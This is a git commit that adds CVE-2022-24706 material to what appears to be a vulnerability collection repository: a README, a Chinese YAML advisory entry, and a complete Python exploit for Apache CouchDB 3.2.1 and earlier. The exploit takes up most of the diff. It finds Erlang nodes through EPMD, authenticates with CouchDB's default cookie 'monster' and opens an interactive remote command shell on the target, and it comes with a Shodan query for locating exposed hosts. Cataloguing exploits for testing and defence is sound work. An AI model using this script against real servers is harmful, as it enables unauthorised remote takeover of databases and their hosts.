添加CVE-2022-24706漏洞

Signed-off-by: Gavinjzl <sy2239113@buaa.edu.cn>
2023-03-10 14:40:56 +00:00 · 2023-03-10 14:40:56 +00:00 · 51cbca8ae8
parent 1ffdffb9bb
commit 51cbca8ae8
4 changed files with 196 additions and 0 deletions
--- a/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py
+++ b/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py
@ -0,0 +1,136 @@
+# Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE)
+# Date: 2022-01-21
+# Exploit Author: Konstantin Burov, @_sadshade
+# Software Link: https://couchdb.apache.org/
+# Version: 3.2.1 and below
+# Tested on: Kali 2021.2
+# Based on 1F98D's Erlang Cookie - Remote Code Execution
+# Shodan: port:4369 "name couchdb at"
+# CVE: CVE-2022-24706
+# References:
+#  https://habr.com/ru/post/661195/
+#  https://www.exploit-db.com/exploits/49418
+#  https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
+#  https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
+# 
+#
+#!/usr/local/bin/python3
+
+import socket
+from hashlib import md5
+import struct
+import sys
+import re
+import time
+
+TARGET = ""
+EPMD_PORT = 4369 # Default Erlang distributed port
+COOKIE = "monster" # Default Erlang cookie for CouchDB 
+ERLNAG_PORT = 0
+EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list
+
+# Some data:
+NAME_MSG  = b"\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA"
+CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04"
+CTRL_DATA  = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03"
+CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex"
+
+
+def compile_cmd(CMD):
+    MSG  = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00"
+    MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"
+    MSG += struct.pack(">H", len(CMD))
+    MSG += bytes(CMD, 'ascii')
+    MSG += b'jw\x04user'
+    PAYLOAD = b'\x70' + CTRL_DATA + MSG
+    PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD
+    return PAYLOAD
+
+print("Remote Command Execution via Erlang Distribution Protocol.\n")
+
+while not TARGET:
+    TARGET = input("Enter target host:\n> ")
+
+# Connect to EPMD:
+try:
+    epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    epm_socket.connect((TARGET, EPMD_PORT))
+except socket.error as msg:
+    print("Couldnt connect to EPMD: %s\n terminating program" % msg)
+    sys.exit(1)
+    
+epm_socket.send(EPM_NAME_CMD) #request Erlang nodes
+if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK
+    data = epm_socket.recv(1024)
+    data = data[0:len(data) - 1].decode('ascii')
+    data = data.split("\n")
+    if len(data) == 1:
+        choise = 1
+        print("Found " + data[0])
+    else:
+        print("\nMore than one node found, choose which one to use:")
+        line_number = 0
+        for line in data:
+            line_number += 1
+            print(" %d) %s" %(line_number, line))
+        choise = int(input("\n> "))
+        
+    ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0])
+else:
+    print("Node list request error, exiting")
+    sys.exit(1)
+epm_socket.close()
+
+# Connect to Erlang port:
+try:
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((TARGET, ERLNAG_PORT))
+except socket.error as msg:
+    print("Couldnt connect to Erlang server: %s\n terminating program" % msg)
+    sys.exit(1)
+   
+s.send(NAME_MSG)
+s.recv(5)                    # Receive "ok" message
+challenge = s.recv(1024)     # Receive "challenge" message
+challenge = struct.unpack(">I", challenge[9:13])[0]
+
+#print("Extracted challenge: {}".format(challenge))
+
+# Add Challenge Digest
+CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii")
+    + bytes(str(challenge), "ascii")).digest()
+s.send(CHALLENGE_REPLY)
+CHALLENGE_RESPONSE = s.recv(1024)
+
+if len(CHALLENGE_RESPONSE) == 0:
+    print("Authentication failed, exiting")
+    sys.exit(1)
+
+print("Authentication successful")
+print("Enter command:\n")
+
+data_size = 0
+while True:
+    if data_size <= 0:
+        CMD = input("> ")
+        if not CMD:
+            continue
+        elif CMD == "exit":
+            sys.exit(0)
+        s.send(compile_cmd(CMD))
+        data_size = struct.unpack(">I", s.recv(4))[0] # Get data size
+        s.recv(45)              # Control message
+        data_size -= 45         # Data size without control message
+        time.sleep(0.1)
+    elif data_size < 1024:        
+        data = s.recv(data_size)
+        #print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
+        time.sleep(0.1)
+        print(data.decode())
+        data_size = 0
+    else:        
+        data = s.recv(1024)
+        #print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
+        time.sleep(0.1)
+        print(data.decode(),end = '')
+        data_size -= 1024
--- a/cve/apache-CouchDB/2022/CVE-2022-24706/README.md
+++ b/cve/apache-CouchDB/2022/CVE-2022-24706/README.md
@ -0,0 +1,26 @@
+# Apache CouchDB 3.2.1 - Remote Code Execution (RCE) CVE-2022-24706
+Date: 2022-01-21
+
+Exploit Author: Konstantin Burov, @_sadshade
+
+Software Link: https://couchdb.apache.org/
+
+Version: 3.2.1 and below
+
+Tested on: Kali 2021.2
+
+Based on 1F98D's Erlang Cookie - Remote Code Execution
+
+Shodan: port:4369 "name couchdb at"
+
+CVE: CVE-2022-24706
+
+References:
+
+https://habr.com/ru/post/661195/
+
+https://www.exploit-db.com/exploits/49418
+
+https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
+
+https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
--- a/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml
+++ b/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml
@ -0,0 +1,32 @@
+id: CVE-2022-24706
+source: https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit
+info:
+  name: Apache CouchDB 是一个面向文档的数据库管理系统。
+  severity: severe
+  description:
+    当CouchDB 以集群模式安装时，会开启epmd服务，并且监听相应端口。由于在默认安装过程中Apache CouchDB 将 Erlang Cookie默认设置为 monster，若未经修改，则攻击者可利用该cookie连接epmd，在知道fqdn的情况下执行任意代码，控制服务器。
+  scope-of-influence:
+    apache-CouchDB < 3.2.2
+  reference:
+    - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-...	
+    - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code...	
+    - http://www.openwall.com/lists/oss-security/2022/04/26/1	
+    - http://www.openwall.com/lists/oss-security/2022/05/09/1	
+    - http://www.openwall.com/lists/oss-security/2022/05/09/2	
+    - http://www.openwall.com/lists/oss-security/2022/05/09/3	
+    - http://www.openwall.com/lists/oss-security/2022/05/09/4	
+    - https://docs.couchdb.org/en/3.2.2/setup/cluster.html	
+    - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00	
+    - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti...	
+    - https://www.openwall.com/lists/oss-security/2022/04/26/1
+  classification:
+    cvss-metrics:  CVSS:3.1
+    cvss-score: 9.3
+    cve-id: CVE-2022-24706
+    cwe-id: CWE-1188,CWE-521
+    cnvd-id:None
+    kve-id:None
+  tags: 
+    - 不安全的默认资源初始化
+    - 弱口令要求
+    - 远程代码执行
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@ -6,6 +6,8 @@ cve:
    - CVE-2021-42013
  apache-APISIX:
    - CVE-2022-24112
+  apache-CouchDB:
+    - CVE-2022-24706
  apache-solr:
    - CVE-2021-27905
  apache-tomcat: